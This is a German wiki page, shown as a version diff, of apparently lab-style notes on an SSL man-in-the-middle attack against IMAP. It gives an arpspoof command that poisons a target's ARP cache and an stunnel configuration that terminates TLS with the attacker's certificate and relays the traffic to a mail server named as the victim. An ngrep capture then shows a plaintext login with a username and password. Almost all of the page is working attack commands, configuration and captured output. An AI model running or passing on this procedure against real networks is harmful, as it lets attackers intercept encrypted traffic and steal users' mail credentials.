SSL Man in the Middle: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
Zeile 5: Zeile 5:
  
 
==arpspoofing==
 
==arpspoofing==
 
+
*arpspoof  -i eth0 -t 192.168.244.26 -r 192.168.244.100
 
 
 
 
  
 
==stunnel==
 
==stunnel==

Version vom 20. Oktober 2015, 17:03 Uhr

Kali Linux

nat

arpspoofing

  • arpspoof -i eth0 -t 192.168.244.26 -r 192.168.244.100

stunnel

  • cat /etc/stunnel/stunnel.conf
debug = 7
options = NO_SSLv2
output = /var/log/stunnel.log

[to-server]
client = yes
accept = 0.0.0.0:9999
connect = thor.opfer.de:993
verify = 2
CAfile = /etc/stunnel/ca.crt

[from-client]
accept  = 0.0.0.0:993
connect = 127.0.0.1:9999
cert = /etc/stunnel/kali.mim.org.crt
key = /etc/stunnel/kali.mim.org.key
CAfile = /etc/stunnel/ca.crt
  • stunnel4 /etc/stunnel/stunnel.conf

ngrep

  • ngrep -d lo -s 1500 -l -i 'login' port 9999
interface: lo (127.0.0.0/255.0.0.0)
filter: (ip or ip6) and ( port 9999 )
match: login
#
T 127.0.0.1:45277 -> 127.0.0.1:9999 [AP]
  . login badura suxpass.                                            
##